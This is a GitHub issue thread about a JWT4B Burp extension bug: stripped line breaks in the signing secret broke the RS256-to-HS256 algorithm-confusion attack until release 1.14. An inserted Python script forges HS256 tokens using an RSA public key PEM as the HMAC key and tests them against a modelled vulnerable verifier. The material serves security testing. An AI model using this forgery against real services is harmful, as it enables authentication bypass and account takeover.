ozzi- / JWT4B

JWT Support for Burp
GNU General Public License v3.0

Wrong Signature #45

Closed emanuelduss closed 3 years ago

emanuelduss commented 3 years ago

Hi ozzi-

I really like this extension and use it a lot but just had some issues while creating signatures with a secret that contains linebreaks.

This is e.g. important in the algorithm confusion attack, where you sign your RS256 token using the public key but with the HS256 algorithm.

Situation

Example JWT:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJmb28iOiJiYXIiLCJpYXQiOjE2MDU3OTk4MTd9.Spvq4AvnNNd8RFTcZJr2r0re7hSxWi1XBvLSEdpBY2k

Decoded:

Headers = {
  "alg": "HS256",
  "typ": "JWT"
}

Payload = {
  "foo": "bar",
  "iat": 1605799817
}

Signature = "Spvq4AvnNNd8RFTcZJr2r0re7hSxWi1XBvLSEdpBY2k"

What I want

I get the expected result in previous versions of the extension.

I want to sign it using the following multi line secret (incl. the last linebreak!):

-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA33TqqLR3eeUmDtHS89qF
3p4MP7Wfqt2Zjj3lZjLjjCGDvwr9cJNlNDiuKboODgUiT4ZdPWbOiMAfDcDzlOxA
04DDnEFGAf+kDQiNSe2ZtqC7bnIc8+KSG/qOGQIVaay4Ucr6ovDkykO5Hxn7OU7s
Jp9TP9H0JH8zMQA6YzijYH9LsupTerrY3U6zyihVEDXXOv08vBHk50BMFJbE9iwF
wnxCsU5+UZUZYw87Uu0n4LPFS9BT8tUIvAfnRXIEWCha3KbFWmdZQZlyrFw0buUE
f0YN3/Q0auBkdbDR/ES2PbgKTJdkjc/rEeM0TxvOUf7HuUNOhrtAVEN1D5uuxE1W
SwIDAQAB
-----END PUBLIC KEY-----

Doing so: (screenshot)

Plugin output on stdout:

15:41:16.377 | JWT4B says hi!
15:41:34.097 | Recalculating Signature with Secret - 'a
b
'
15:53:36.827 | Recalculating Signature with Secret - '-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA33TqqLR3eeUmDtHS89qF
3p4MP7Wfqt2Zjj3lZjLjjCGDvwr9cJNlNDiuKboODgUiT4ZdPWbOiMAfDcDzlOxA
04DDnEFGAf+kDQiNSe2ZtqC7bnIc8+KSG/qOGQIVaay4Ucr6ovDkykO5Hxn7OU7s
Jp9TP9H0JH8zMQA6YzijYH9LsupTerrY3U6zyihVEDXXOv08vBHk50BMFJbE9iwF
wnxCsU5+UZUZYw87Uu0n4LPFS9BT8tUIvAfnRXIEWCha3KbFWmdZQZlyrFw0buUE
f0YN3/Q0auBkdbDR/ES2PbgKTJdkjc/rEeM0TxvOUf7HuUNOhrtAVEN1D5uuxE1W
SwIDAQAB
-----END PUBLIC KEY-----
'

Screenshot: (image)

This works as expected.

Also CyberChef confirms that this is the correct behavior:

(CyberChef screenshot)

What I get

In the latest release, the attacks did not work anymore :(.

Performing the same steps as already described.

Plugin output on stdout:

15:55:18.704 | JWT4B says hi!
15:55:56.423 | Recalculating Signature with Secret - '-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA33TqqLR3eeUmDtHS89qF3p4MP7Wfqt2Zjj3lZjLjjCGDvwr9cJNlNDiuKboODgUiT4ZdPWbOiMAfDcDzlOxA04DDnEFGAf+kDQiNSe2ZtqC7bnIc8+KSG/qOGQIVaay4Ucr6ovDkykO5Hxn7OU7sJp9TP9H0JH8zMQA6YzijYH9LsupTerrY3U6zyihVEDXXOv08vBHk50BMFJbE9iwFwnxCsU5+UZUZYw87Uu0n4LPFS9BT8tUIvAfnRXIEWCha3KbFWmdZQZlyrFw0buUEf0YN3/Q0auBkdbDR/ES2PbgKTJdkjc/rEeM0TxvOUf7HuUNOhrtAVEN1D5uuxE1WSwIDAQAB-----END PUBLIC KEY-----'

Screenshot: (image)

All linebreaks from the secret input are removed.

This results in a non-working attack :(.

Issue

Solution

Can you fix this?

Thanks & best regards, Mänu
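The attack this issue is about, as an added Python example (this is not code from the issue or from JWT4B): it builds the HS256 signature over the header and payload from the example token above, using the RSA public key PEM as the HMAC secret, once with the line breaks intact (trailing newline included) and once with them removed, the way the broken release flattened the secret field. The PEM-as-key rule and the `verify_hs256` server model are assumptions for illustration; they stand in for a verifier that trusts the `alg` header and feeds its RSA public key bytes into an HMAC check. Which exact bytes the target uses as the key (with or without the trailing newline, CRLF or LF) is the thing a tester has to match, which is why a secret field that silently rewrites line breaks breaks the attack.

```python
"""Algorithm-confusion forge: HS256 over the server's RSA public key PEM."""
import base64
import hashlib
import hmac
import json

# Constructed inputs copied from the issue: header, payload and the RSA public
# key PEM. The trailing newline is part of the PEM file, so it is part of the
# HMAC key when the server uses the raw file bytes (assumption, see lead-in).
HEADER = {"alg": "HS256", "typ": "JWT"}
PAYLOAD = {"foo": "bar", "iat": 1605799817}
PUBLIC_KEY_PEM = """-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA33TqqLR3eeUmDtHS89qF
3p4MP7Wfqt2Zjj3lZjLjjCGDvwr9cJNlNDiuKboODgUiT4ZdPWbOiMAfDcDzlOxA
04DDnEFGAf+kDQiNSe2ZtqC7bnIc8+KSG/qOGQIVaay4Ucr6ovDkykO5Hxn7OU7s
Jp9TP9H0JH8zMQA6YzijYH9LsupTerrY3U6zyihVEDXXOv08vBHk50BMFJbE9iwF
wnxCsU5+UZUZYw87Uu0n4LPFS9BT8tUIvAfnRXIEWCha3KbFWmdZQZlyrFw0buUE
f0YN3/Q0auBkdbDR/ES2PbgKTJdkjc/rEeM0TxvOUf7HuUNOhrtAVEN1D5uuxE1W
SwIDAQAB
-----END PUBLIC KEY-----
"""


def b64url_encode(data: bytes) -> str:
    """Base64url without '=' padding, as JWS (RFC 7515) requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Inverse of b64url_encode; re-adds the padding the token omits."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_part(obj: dict) -> str:
    """Compact JSON (no spaces) reproduces the exact bytes of the issue's token."""
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode("utf-8"))


def sign_hs256(header: dict, payload: dict, key: bytes) -> str:
    """Attacker side: HMAC-SHA256 over 'header.payload' with an arbitrary key."""
    signing_input = f"{encode_part(header)}.{encode_part(payload)}"
    tag = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(tag)}"


def verify_hs256(token: str, key: bytes) -> bool:
    """Hypothetical confused server: alg says HS256, so it HMACs with its 'key',
    which in the vulnerable case is the raw RSA public key PEM."""
    try:
        h, p, s = token.split(".")
    except ValueError:
        return False
    expected = hmac.new(key, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(s))


def secret_as_typed(text: str, strip_newlines: bool) -> bytes:
    """Model the extension's secret field: the broken release removed every
    line break from the pasted secret, the fixed release passes it through."""
    return (text.replace("\n", "") if strip_newlines else text).encode("ascii")


def demo() -> dict:
    """Forge with three variants of the secret and check them against a server
    whose key is the exact PEM bytes. Only the byte-exact secret verifies."""
    key_exact = secret_as_typed(PUBLIC_KEY_PEM, strip_newlines=False)
    key_flattened = secret_as_typed(PUBLIC_KEY_PEM, strip_newlines=True)
    key_no_trailing_nl = secret_as_typed(PUBLIC_KEY_PEM.rstrip("\n"), strip_newlines=False)

    forged = sign_hs256(HEADER, PAYLOAD, key_exact)
    forged_flat = sign_hs256(HEADER, PAYLOAD, key_flattened)
    forged_no_nl = sign_hs256(HEADER, PAYLOAD, key_no_trailing_nl)
    return {
        "forged": forged,
        "forged_with_flattened_secret": forged_flat,
        "forged_without_trailing_newline": forged_no_nl,
        "server_accepts_exact": verify_hs256(forged, key_exact),
        "server_accepts_flattened": verify_hs256(forged_flat, key_exact),
        "server_accepts_no_trailing_newline": verify_hs256(forged_no_nl, key_exact),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The three forged tokens share the same `header.payload` prefix and differ only in the signature, which is exactly what the screenshots in this issue compare: the same input produces a different (and, against the real server, rejected) signature as soon as the tool changes a single byte of the secret.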

ozzi- commented 3 years ago

Hi Mänu

Thank you for the exemplary issue! However, do you know if this worked with 1.12? Meaning the perpetrator is in v1.13.

Cheers

ozzi- commented 3 years ago

Commit identified https://github.com/ozzi-/JWT4B/commit/feed19960dc6e45eb0ae3a4f1e5fa11343abb506

ozzi- commented 3 years ago

Can you please see if this works? Alternatively feel free to build from the latest commit ;) (attachment: JWT4B.zip)

emanuelduss commented 3 years ago

Yayy

(screenshot)

Awesome, THX!

ozzi- commented 3 years ago

Thanks :) https://github.com/ozzi-/JWT4B/releases/tag/1.14